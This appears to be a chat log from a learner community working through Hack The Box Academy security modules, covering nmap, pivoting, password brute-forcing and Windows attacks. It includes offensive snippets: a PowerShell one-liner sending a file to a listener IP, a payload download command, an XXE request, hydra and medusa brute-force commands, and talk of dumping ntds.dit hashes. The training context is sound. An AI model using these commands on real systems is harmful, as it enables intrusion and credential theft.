But yeah as someone coming from paper/file note taking I would prefer FOSS so I can customize it
I think they are the most common
Cool, would look into it
Notion for Studying notes. Obsidian for sensitive stuff
Yes Very common.
I have an issue in the Nmap module where on page 03 it is asking a question but there is no machine or IP available for scanning?
@naive sage welcome to modules channel
ssh -R <InternalIPofPivotHost>:8080:0.0.0.0:8000 ubuntu@<ipAddressofTarget> -vN
Which ip should come to <InternalIPofPivotHost> in the command.
Attack Host ----ssh ----- ubuntu --> Windows machine
Ubuntu and Windows machine on the same network. Attack host only has ssh connection with ubuntu
Thanks.
what is the question and is it module Network Enumeration with Nmap?
Seems like it is asking for an answer based on the above results.
Based on the last result, find out which operating system it belongs to. Submit the name of the operating system as result. this one?
Yes. right this one
have you had a look at the hint?
holy moly
how was i living before this
thanks bro!
You're welcome.
the IP of the ubuntu machine that starts with 172 iirc
@midnight galleon Yes, I wrote that. I connected to the Windows machine the old-fashioned way, by creating a tunnel, because there is no program on the ubuntu machine that I can connect to with RDP. I did everything right but the reverse shell meterpreter session does not come up; I guess it might be confused because I created these 2 tunnels
The hint and some research literally gives you the answer
Ideally the ubuntu host, but be aware that in the greater sense your pivot approach may dictate otherwise (you often will not have a Linux device hanging out on a Windows network in a real-world scenario). You can ssh with powershell or cmd.exe though.
Which xfreerdp returned nothing? Also you should be able to apt install if it can reach the internet? Aren't you ssh'ing? Why the need for RDP?
@quiet trout You're right, but that's not the point. I've solved the room, but I'm trying the things it shows in the room, and it's not working. It's incomplete.
1. We create a payload with msfvenom from the attack host and send it to the ubuntu machine via ssh.
2. We start a python server on the ubuntu server and send this payload to the windows machine.
3. `Invoke-WebRequest -Uri "http://172.16.5.129:8123/backupscript.exe" -OutFile "C:\backupscript.exe"` command to download and run the payload.
4. `ssh -R <InternalIPofPivotHost>:8080:0.0.0.0:8000 ubuntu@<ipAddressofTarget> -vN`
and at the same time I am listening from the attack host but there is no connection.
Also the logic in the room seems wrong to me. I already need to create a bridge with extra ssh to reach the windows machine because I can't connect to windows from the ubuntu machine, because there are no tools and they cannot be downloaded from the internet.
Not looking at the module, but I'm not sure I follow your attack flow there. Step 3 appears to create a request (GET?) which downloads the payload but does not run it; is there more that's not there?
Creating a web request on the ubuntu server would download the file locally though? Perhaps you need to use the python server to SERVE the python request (script?), then retrieve it from the windows machine and run it?
@solar grove ^
Good
Module: Windows Privilege Escalation
Section: Event Log Readers
Link to section: https://academy.hackthebox.com/module/67/section/602
In this section, it states the following:
Note: Searching the Security event log with Get-WinEvent requires administrator access or permissions adjusted...
What's the point of if administrator permissions are required? I'm assuming you'll need administrative privileges to modify the registry key too?
it can contain other creds
Oh, right, that slipped my mind. But wouldn't it be simpler to just use wevtutil? Or is this in case that doesn't work?
you can use wevtutil
SOC Analyst -> Windows Attacks/Def -> ACLs
https://academy.hackthebox.com/module/176/section/1789
I'm having a hard time exfiltrating the SharpHound output zip to the pwnbox to visualize the data from the windows box...
Here's my approach... a powershell stream back to the pwnbox with nc
```powershell
$client = New-Object System.Net.Sockets.TcpClient("10.10.15.58", 9001); $stream = $client.GetStream(); $writer = New-Object System.IO.StreamWriter($stream); $writer.Write([System.IO.File]::ReadAllText("c:\users\bob\downloads\bh.zip")); $writer.Flush(); $writer.Close(); $stream.Close(); $client.Close();
```
The nc listener just stays running... even though the zip is only 13kb
Is BloodHound installed on the windows machine? Can't find it. Or perhaps there is another less error-prone way to do this?
why not just mount a drive over rdp or host a smb server
I'm being lazy -_-
but I'm kinda out of options, ain't shit working, prob firewall
actually I don't think I've done a drive mount over RDP before
xfreerdp is an X11 Remote Desktop Protocol (RDP) client which is part of the FreeRDP project. An RDP server is built-in to many editions of Windows.
thx, this didn't turn up when I just tried a Google. I'm using DDG tho, maybe that's why
wow this is quite easy
@next bronze capital idea, putting some respect on yo name.
for finding stuff, always use google.
yes, i did.
Anyone able to give me some help with Abusing HTTP Misconfigurations Skills Assessment - Hard?
Feel free to send me a DM
Hello, I'm having issues with my nmap scan. I'm still new and would like to know if anyone has had nmap scans take 10+ mins.
What's the exact command? Did you use -T?
-p- will scan all the TCP ports; you can use -T4 to make it faster
@limber river what does -T4 do?
-T<0-5>: Set timing template (higher is faster)
use the help or check this https://nmap.org/book/man-briefoptions.html
Can anyone help me with "Windows Lateral Movement \ Skills Assessment"? I'm stuck on the question "What is the password for VNC?". I did everything right and even wrote to support; they told me to do what I had already tried to do. Apparently it's a bug, but then they just told me to email them and that's it.
Hey guys, anyone know if I can use a username list with crackmap?
remove the dot and write the full path to the dictionary.
Yes you can use a username list with CME.
mb I used the wrong path. Do you guys know why ./crafted.txt doesn't work?
For crackmap do I need to use the full path?
no need for ./
depending on where crafted.txt is located
oh yeah it was not in this directory, oops
maybe there's some special channel for such questions, or is this it?
You are in the correct channel. I haven't done that module, otherwise I would give you some information.
Have you granted yourself admin privs? If so, just run the same commands as the module
You have to do it in the VNC server not the client
Where is it located? Isn't it on the support server?
After all, that's the only place WSUS has access to
It's not pinging from any server
Did you get access to Backup?
bloodhound module
SharpHound - Data Collection from Windows
When I run runas /netonly /user:INLANEFREIGHT\htb-student cmd.exe
it asks us for a password which isn't available
No, because there's no way to reach it, even with wsus there's no response from it
The module is pretty much structured as to jump from one host to another
Push an update to grant you access
I accidentally cleared the terminal with the password -_- do you guys know how to save the positive user and pwd with crackmap? I guess if I do > creds.txt the failures will also be in there?
like pw reverse shell?
What device blocks network access or traffic?
Firewall?
The most basic one anyways
hi dear member I just joined the platform and I wanted a mentor to guide me in learning
There’s your answer
You will need admin privs to read the registry after
ChatGPT can give you the specific command
If I press Enter anyway it works, but it gives a non-domain cmd
Thank you so much bro, I didn't think they'd be so hardcore.
The rest is pretty straightforward
This is very strange, if there is a firewall on the server, why is it not pinging from wsus? But it is still possible to release updates.
Would you block windows update on your servers?
But to answer your question, there were some people that found some ports available and got a shell differently
I scanned all ports and found nothing, but it was from support server, maybe there is something with wsus.
Guys, is it possible that you can't connect with every user account on WinRM?
I found some credentials but can't log in to WinRM
Need to be a member of the “Remote Management Users” group
okay thanks for the info
SOC Analyst -> Windows Attacks/Defense -> ESC1
https://academy.hackthebox.com/module/176/section/1790
Cannot RDP to ws001 from Kali; "the trust relationship between this workstation and the primary domain failed" type error
I've reset box twice now, can someone try and rdp to this machine for me as a sanity check?
I am having a hard time wrapping my head around CIDR. Why would it be /26 for an IP address of 192.168.12.160? Why wouldn't it be /27, since the last octet needs both the 128 and the 32 place to make the IP address?
Hey guys can you help? I do the same as in the lab but I can't copy it?
I know that there is the crackmapexec method but I want to try this one too
so you have a 2^6=x-1 range for hosts per subnet, 64 (or 62 however you prefer to look at it) each, starting at 0, 0-63,63-127 and so forth
So addy 192.168.12.160 is in the range of your 4th and final subnet, which ends at 191. I don't follow the last part... with CIDR you're subnetting based on the need for devices per subnet.
Have a look at this chart it might help
You can try opening a CMD session and see if it will error out
I’ve had some error with WinRM in the past (which I think were due to how it handles connection, but that’s another thing to discuss) which I resolved having a CMD reverse shell via Netcat
ah, ok. Thank you!
You can do this quickly by subtracting the total bits (32) minus your range, and squaring it.... If you are tested you will see something like.... what is the first valid host on the 192.168.173.193/30 subnet?
You should be able to do these in your head; a good quizzing site is like this:
https://www.subnetting.net/Start.aspx
It's basically mandatory to be able to work these out quickly and correctly for the CCNA...
I say "should" because most people (yours truly included) learned this stuff for certs/exams, but I'm finding myself unable to do them rapidly after years of non-use (we use calculators or whatever in the real world so it never comes up)
@elder saddle ^
I appreciate that. That's definitely something I need to work on.
idk it's weird, now I have this
You don’t need to use cmd /c in this situation
Just use move or copy
Also evil-winrm has a download feature, but it’s kinda slow
Hello everyone. I'm studying the Web Fuzzing module, and I've come to where Wenum is explained. When I try to install the tool as described via the pipx command it doesn't work.
Hey kids
I hope I'm asking for help in the right place
still looking for help here regarding an rdp sanity check if anyone has access and would be so kind... #modules message
I am not able to connect to the remote host using the "HTB_@cademy_stdnt" password. Anyone here to help me?
What’s wrong with the copy
When I do it I don't have the file, so I can't transfer it to my SMB share
I have an ntds.dit in windows\ntds\
but in the module they show to use the command I just did
Alr imma try it out
thanks ^^
Doesn't look like the normal copy works, but just like the example, cmd /c works
Here it looks like it worked, but you didn't make an ntds directory first
gonna try again
I just directly used cme on that one 😂😂😂
HTB_@cademy_stdnt!
okay, you were right, but now how do I avoid this ^^ so I can see the hashes and decrypt them with hashcat
You can't copy ntds.dit
because it's always in use by the process
by lsass
You need to use secretsdump.py
wtf
Yeah use secretsdump
you can use shadowcopy to copy it normally.
not on system
Is it a repo or something? Never used it before
It's in impacket.
They used the tool in the SAM section
oh okay, but I need the SYSTEM file too. I will check that later, thanks for your help, both of you
Can someone help me? I'm trying to do Linux Fundamentals and for the first question of Find Files and Directories I can't get the answer. I even googled a guide and ran the command suggested in the guide but I get no file. The question is "What is the name of the config file that has been created after 2020-03-03 and is smaller than 28k but larger than 25k?"
I'm running the terminal command `find / -iname "*.conf" -size +25k -size -28k -newermt 2023-03-03 2>/dev/null` and I get nothing
you put 2023 instead of 2020
thank you
Guys, I'm doing the brute force module and the python script given, "pin-solver.py", for the first section keeps crashing. Any idea?
Crashing can mean anything. If you're getting any feedback you'd have to provide the details. Typically with Python it's a stacktrace.
https://academy.hackthebox.com/module/54/section/511
For question number 1, should I add the IP to my hosts file?
```
Traceback (most recent call last):
  File "/usr/lib/python3/dist-packages/urllib3/connection.py", line 203, in _new_conn
    sock = connection.create_connection(
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3/dist-packages/urllib3/util/connection.py", line 85, in create_connection
    raise err
  File "/usr/lib/python3/dist-packages/urllib3/util/connection.py", line 73, in create_connection
    sock.connect(sa)
TimeoutError: [Errno 110] Connection timed out
```
It crashes after a few attempts
This suggests you're unable to make a connection to the remote system. I haven't done this module and don't understand the broader context of pin-solver.py, but I would check that you're specifying the correct address and port and that the system on which you're running the python script is able to communicate with that system in the way it expects.
I used the password.list from the resources provided by htb
It's working, it sends let's say 200 or 300 tries, then crashes
Again, I haven't done the module, but I might ask if there's a way to throttle the requests, extend the timeout period, or if you can identify that the service/server is becoming unresponsive for other reasons.
nvm, I found the flag. I had to change the script to start where it crashed when restarting
Excellent! Great solution.
yea, good thinking
I don't remember the challenge, but it's worth looking for another service running, no?
thanks bro
this one says ssh specifically 😅
@pine dune Sorry to chop up your question. Sounds like you've done everything right so far and I'll bet you're wondering why it's going to take 90 days to crack ssh
Consider if other services might use the same authentication mechanism on the back end.
maybe the user is lazy ?
Yeah, it's taking longer than usual... knowing HTB they don't make us spend long on enumeration, so I thought what's up lol
okay cool, you mean what @rocky estuary is suggesting?
😉
haha that'd be good for us
Thank you... I'm a little new to enumeration and I hate it. What service would you recommend I enumerate instead of ssh?
maybe ftp?
maybe 🤷♂️
I would suggest you try them all and figure out which is fastest, using which tool, and with what options.
yea, like this challenge specifically I took the opportunity to figure out what every tool was good at cracking and note my preferences down for the service. i know it's tedious but you learn a lot.
Threads are separate processes that belong to the same program.
thank you sounds like I'll do that too
could you please elaborate 😅
E.g. if you have one thread, it can try one password until it receives results... if you have 10 threads, each of those 10 threads can try a different password.
in parallel
More threads = more speed, but it will also require more resources from your machine
ahh okay thank you
thank you
Right, as SORA notes you'll choke either your computer or the network or the service at some point if you floor it.
ahh I see
What's a decent number of threads? Someone told me 48?
For this challenge 48 is probably good, but it's entirely sensitive to the environment at the time.
ahh ok, any ideas for the errors above? All I changed was the service, if I remember correctly
plus that's not a Windows machine
This shows that you're authenticating with the user "\sam". When authenticating against SMB you've always got to provide a workgroup or domain. E.g. "SOMETHING\sam".
try .txt instead of list
okay thanks
There are 3 options to do this with netexec / crackmapexec
Change the extension, it might read it wrong
ahh yes thank you
.list > .txt
ok ill try txt
no
the mutated password list is saved as .list tho
No? Go on...
In the image he shared he is using CME with SMB. You're right for FTP.
okay then
did you read module?
No, CME will identify the workgroup or hostname if you use the, I think it's, --localhost flag. (edit: oops, no, it's something else but still a good enough hint)
yeah I did but I read it a while ago and coming back to the question today
It's not cheating to go back and reference things.
read again...
yea the username is sam in question
Okay, and if you use a list of passwords, then provide a .txt file
it doesn't recognize .list
ok so change it to .txt? ill do that
yeah
thanks, lemme try
Guys, I figured out why it wasn't working
I wasn't in the correct folder
I don’t think this is true
crackmapexec ftp 10.129.21.126 -u sam -p mut_password.txt
I used this and boy did it give results instantaneously
Think all of them are coming back red tho
IMO, someone on HTB's payroll (@blissful verge? @gilded lion?) needs to straight-up sed -i 's/crackmapexec/nxc/g' all the module content. There's more outdated stuff where that came from (i.e. a clear lack of Ligolo content in the pivoting module), but at least that would bring everything up to code.
```
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-10-04 19:45:41
[DATA] max 16 tasks per 1 server, overall 16 tasks, 94044 login tries (l:1/p:94044), ~5878 tries per task
[DATA] attacking ftp://10.129.21.126:21/
[STATUS] 288.00 tries/min, 288 tries in 00:01h, 93756 to do in 05:26h, 16 active
[STATUS] 154.67 tries/min, 464 tries in 00:03h, 93590 to do in 10:06h, 6 active
[ERROR] all children were disabled due too many connection errors
0 of 1 target completed, 0 valid password found
[INFO] Writing restore file because 2 server scans could not be completed
[ERROR] 1 target was disabled because of too many errors
[ERROR] 1 targets did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-10-04 19:48:51
```
Try going back to the .list to see if that makes any difference + try changing the VPN
Is it normal that the DMZ box in the Attacking Enterprise Networks module dies when running rpcinfo?
Here we go again... lol
did you format it correctly?
https://unix.stackexchange.com/a/734936/115433
that worked for me
Hey, I'm looking for help with Windows Evasion, about running Seatbelt in memory. I've tried multiple ways to patch AMSI and it seems it worked, but I can't run Seatbelt afterwards
Silly question.... on AD Attacks Module - Enumerating from Windows. When using BloodHound to find how many Kerberoastable accounts, may I assume that we just count the nodes? That's what I did at least.
@rough comet Your query is correct
Or does Bloodhound show just the number, somehow, somewhere?
You may use that and a few other methods to find the users you can Kerberoast
right right
If its not too many just count it
but there is no obscure feature that shows just the number? Yeah, I got the answer, just wanted to know
It is rather inefficient to do it at scale though
But I do believe BloodHound CAN show Kerberoastable users as a view
hmmm
Let me make sure
interesting
If you get a lot of results add | wc -l to count them all
Okay so this is a custom view that someone made
off topic but related... I could not use xfreerdp... I've had RDP issues the whole week. Never used rdesktop till now. Was the only workaround.
Please check your DMs
Hello guys
I have been having issues with the Windows Event Logs section
After analyzing the event with ID 4624 that took place on 8/3/2022 at 10:23:25, the only executable I found was services.exe
However, it is showing that it is not the answer. Any idea on what the right answer would be?
Hello, I guess the question was already asked, but are there problems with xfreerdp?
Ok, I've got what should be an easy question. I am trying to submit a flag on the Nmap module, Nmap Scripting Engine section. I have the flag ||H...}.|| I cut and paste it to ensure no spaces are on the front or tail of the string. I keep getting a response that it's the wrong answer. What am I missing? 🙂
You sure no spaces? 😉
Apparently yes
I've triple-checked but I'll give it another go
lemme check the section rq
No spaces
what is the first char between {}
p
wrong
scripting section right?
Nmap Scripting Engine section
Repeat your enumeration
Really? A false flag eh. lol Ok I'll keep looking.
Incoming DM 🙂
you received info from the wrong port
if you want any help dont hesitate
If RDP is not working, how am I supposed to go further lol
the vpn was fine because I was able to ping it
where you stuck? maybe i can help
Hi, thank you... I've been stuck on password mutation for a while now
in the Password Attacks module
Great.. I did the password mutation using the resources and I've tried to brute force the password using cme, but I've been recommended to use hydra and netexec
Just beginning this module, do I need to keep going back to Introduction to spawn the DEV machine, build and test a payload, then go turn the one for the module in which I'm working on ?
so I'm trying with hydra now
here's my command ```hydra -l sam -P mut_password.txt ftp://10.129.202.64```
did hydra already try the whole mut_password.txt file?
not sure if it tried all of it but its still going on
okay I understand it
your command is good
but what is weird is that with you it can execute
that is my output
but if you look in the section it says that with hydra you can sometimes have errors
with that hint you should get it i guess
If you dont have a Windows machine yep this is a solution
like you see there, it will take a whileeeee; there is another tool that you can use that will be much quicker
btw sorry for the confusion but the hint is in the network services section
could u give me a clue on what tool to use?
network services? have we covered that module before?
is that before password attacks?
its the section just before mutation section
you will find it there and its gonna be way faster
tell me when its good
ok ill have another look, thanks bro
I know HTB has said they are working on a solution for this to have both running at the same time, but I don't think it's been implemented yet. Visual studio community is free to use personally if you have a windows computer.
do we brute force ftp?
forget ftp here
which tool are you gonna use now? did you find it?
msfconsole?
yup, what did you see in the network services about the hydra error?
let me see
like I said your hydra command for bruteforcing ftp was good but like you saw it was taking a while, there are other ways
I wasnt getting any error 😅
ahh
maybe msfconsole?
no error when you try smb brute force with hydra?
yeah you tried ftp which is not a bad idea, I mean if you have 5 hours to spend
ahh
try first with hydra
ok cool let me try that, thanks
and screen me the result
doesn't support smbv1
tada, and what does the section suggest?
we can manually update and recompile hydra or use another very powerful tool, the Metasploit framework.
yes the recompile is not my lvl so I didn't try it, but if you look further it shows you the way to go
thank u yes... I'll try msfconsole
@pine dune and @tender nimbus you should take this to DMs since this isn't a tier 0 module.
i know mb ^^
thank u
ok ty
can I dm u 😄
go ahead
I deleted my message due to 'Gubarz' note. You can DM me for further assistance.
How can I copy and paste text from my browser to the pwnbox?
Hey guys do you know how to clone that release?
it doesn't let me
i need the exe file
u just git clone it
as normal
it doesn't work ^^
I got it sorted. Thank you!
can't do it with the exe file 😬
are you sure?
If you just want the executable, click on it? That link will download the file
If you just want the source it's bundled right below in the zip
had to do it with a vm and transfer it to the target, to finally find out that I can't execute the file while I run the cmd as administrator?
What?
Looking for help with advanced xss Exploiting internal Web Applications I
Don't need to, just copy the link to the .exe file and wget it.
And if you're trying to get it onto a target machine, I suggest reviewing the File Transfers module. You're going to need to use those methods a lot in subsequent modules.
I think I've missed a step... gonna give it another few hours... lol
so I'm having a problem figuring out how to load my pub key to the remote server???
stuck on this, module cracking passwords, got the user and password for the smb, i cant seem to access directories within the shares.
yes... I figured out how to paste key... just still getting asked for password for user2
nvm you said pub, not priv
Network Services
Are you passing the priv key to the cmd?
And have you put the pub key in authorized_keys (or whatever exact name of the folder is)
thought so...lol,,, bout to try some more
If you do, chmod 600 although I think you'd get a different error if you didn't
how to start doing hack the box if I only know programming in python and lua and have some Linux experience and I know how pcs work, but no hacking experience
ya grx
Start with the free modules, you have plenty of free modules that let you discover different topics etc...
Yeah I thought so, just told him to verify his account, I figured that's anyway the first step :p
Thanks
That's actually a side question (can take it to DM if you prefer) : Why not have a side #general-ES server (applicable in whichever is your 2nd most spoken language in your userbase of course) ?
'Night
Main concern is mods being unable to moderate content in a language that they are not fluent in.
It's not really good because I don't know much English and even if I learn quickly it will take me a long time.
Move this to general please - this channel is for module discussions
ok no problem, thanks for the information
hi, I'm trying a log poisoning but it doesn't seem to work. I'm in the lfi module at the last exercise
do you have any ideas
If you're still stuck on this maybe identify other network services that are open that you could potentially authenticate to.
Hi, anyone completed Abusing HTTP Misconfigurations "Common Session Variables (Account Takeover)"? Can you recommend how to bypass 2MFA?
Maybe try doing something with your User-Agent if it's truly uploaded the shell?
I feel like nothing is happening
You can DM if you'd like.
I reset the admin password but don't know how to reset the security question; if done, I think I can bypass the 2MFA.
Hi admin, please give me a recommendation.
What free modules
All the 10 cubes modules give you the 10 cubes back by completing them. So they're basically free as long as you have the 10 cubes in the first place
I believe they are all the Tier 0 modules (TBC)
hi everyone please help me with
module: Pivoting, Tunneling, and
Port Forwarding
Submit the contents of C:\Flag.txt located on the Domain Controller.
I have ntlm hash v****
I connected and saw there IP addre ****10.5 on Z:\ but what should I do next, I seem to have reached a dead end, help
is it possible to set up a VPN on my parrot VM so I don't need to use the in-browser pwnbox?
Maybe do some enumeration? Are you on the skills assessment?
Yup
Do you have the VM running?
Actually just DM me this isn't really module related.
sent
Is this the place that we can get help with modules in understanding them?
yes
I'm barely on information security foundations - Linux fundamentals module. I have gone through the reading material but it seems I am not understanding the questions for the lab. It does not seem to pertain to the text learning, using commands like more, less, head, tail, grep, etc. Is it just me that is not understanding, or are the questions pertaining to the lesson?
include what section and question you're on
Oh sorry forgot that. Filter contents section. How many services are listening on the target system on all interfaces? (Not on localhost and IPv4 only)
yeah seems like that section doesn't really cover it, I haven't done that module but I'm guessing it builds off previous sections? the netstat command can show this to you
Ok so it’s not just me then? The other 2 questions are similar that it does not seem to go with lesson.
again i'm not sure i didn't do that module, it could build off previous sections
Ok sounds good. Thanks for the help
That's because the module has already gone over the other commands, it's now teaching you to combine them together
ahh review is key. I can see that now. Had to look more into man page for netstat and working on it. Thanks
Recall from the Password Attacks module that NTLM cracking is optional, not mandatory.
ugh nvm, I swear I tried what it just accepted T^T
POST /addEvent.php HTTP/1.1
Host: 94.237.54.201:54512
User-Agent: curl/8.5.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://94.237.54.201:54512/event.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 284
Origin: http://94.237.54.201:54512
Connection: keep-alive
Cookie: PHPSESSID=u5mub8b79qc2euunnhq4fe8v93; uid=52
<?xml version="1.0"?>
<!DOCTYPE details [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/flag.php"> ]>
<root>
<name>thisname&xxe; </name>
<details>123</details>
<date>3333-11-22</date>
</root>
Why did this HTTP request not work when there were 2 lines between the headers and the XML, but it worked when there was only 1 line separating them?
guys I'm doing the login brute module and it asks to brute ssh with medusa but I get this error every time I use it: "ERROR: No supported authentication methods located."
what is the full command you typed when getting the error?
medusa -h 94.237.57.154 -u sshuser -P 2023-200_most_used_passwords.txt -M ssh
You have to specify the port
For the Nmap Enumeration module of CPTS, the hard lab requires interacting with a port, but I could not find the port and it was only by looking at the forum that I could find it. So I have been trying to practice performance/timing options so I will be able to enumerate more comprehensively going forward. However I could not for the life of me get a UDP scan which, when scanning all ports with -p-, would take over 2 hours, and experimenting with timing configurations, I could get it to a reasonable amount of time but then I wouldn't detect the port. I have been unable to replicate a full port scan via UDP that would take less than 2 hours and yet discover the port required to answer the question.
I did nmap the host, it's using port 22
If a public IP appears as a target, this is a Docker container.
Then you may ONLY use this one port.
Everything else on this IP does not belong to your attack vector
I don't get it, am I supposed to use the instance port given in the academy web page?
I think payloadbunny is saying to specify the port in your medusa command
No, you should specify the port of your target...
medusa -h 94.237.57.154:52927 like this u mean ?
Yes, but Medusa uses a different spelling for this
i used the -s flag "medusa -h 94.237.57.154 -s 52927 -u sshuser -P 2023-200_most_used_passwords.txt -M ssh"
same problem
If your target looks like this, then only this one port is in scope for you. Everything else on this machine does not belong to the target
Yes, bc
-s : Enable SSL
ohh my bad
its working my bad thanks for the help
I looked on reddit and reminded myself 50000 was not UDP. 😬 not so bad
hello, Firewall and IDS/IPS Evasion - Hard Lab
it's very hard, I found ports open:
22/tcp open ssh
80/tcp open http
I tried many commands like -Pn -sS -sA -A... none of them gave me a result for the service
Hey I'm trying to install LaZagne.exe but can't find it in the https://github.com/AlessandroZ/LaZagne repo?
There are only .py files
Anyone have an idea or hint to convert .py to .exe so that I can transfer it to my target?
It's right there under releases on the right side of the page: https://github.com/AlessandroZ/LaZagne/releases/tag/v2.4.6
tried this but I don't receive the needed script ^^ I already tried yesterday
mb wait i think i got it
I am working on the Nibbles - Web Footprinting from Getting Started and it seems that any path that ends with / is rejected by the server.
For example a redirect from /nibbleblog to /nibbleblog/ will never return anything
$ whatweb http://nibbles.htb/nibbleblog
http://nibbles.htb/nibbleblog [301 Moved Permanently] Apache[2.4.18], Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache/2.4.18 (Ubuntu)], IP[10.129.79.125], RedirectLocation[http://nibbles.htb/nibbleblog/], Title[301 Moved Permanently]
ERROR Opening: http://nibbles.htb/nibbleblog/ - Net::ReadTimeout
Any idea what could be wrong? Is the module working correctly?
it should work, make sure you're connected to vpn and try resetting
WAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHHHHHHH
Hey guys do you have some tools for password hunting? I'm on the section and it takes a while before finding someting
smb is strictly said
to what I need to authenticate to, I got the user and password, it just doesn't let me view inside the shares
Thanks, please disregard.
I figured it out. 🙂
The issue was coming from my reverse shell php script.
Return to the reverse shell script HTB gave for this module, then make sure to add the attacker's IP address. Save, then upload it to Nibbles → plugin → My image.
You can find your IP by going to the terminal: ifconfig / ip a
Try everything taught in the materials as per evasion techniques, and also make sure you have found all ports and services, as nmap by default only scans the top 1000 ports
I'm at the nmap module but scanning takes so much time, is there a command to speed up the process for a -sV -p- scan? I've got a pretty good connection (I'm using a vm, not pwnbox), ty
read Firewall and IDS/IPS Evasion module again. all what you need is there.
do you need scan all ports? there are timing templates to speed it up -T4 etc
In Network Enumeration with NMAP > Performance section, the max-retries argument is set to 10 by default, so if nmap did not receive any response from the target within the rtt timeout, nmap will retry up to the mentioned max-retries times, right? But why is it just retrying only 1 time if I disabled host discovery, or only 8 times if I enabled host discovery? I tried with a target that doesn't exist in my LAN for this so I can see how it works and improve my understanding.
ty for the answer, maybe I'm misunderstanding but it is written: "Enumerate all ports and their services." I need to do -p- right?
yeah all ports scan will take a while then, use -T4 and wait for it to complete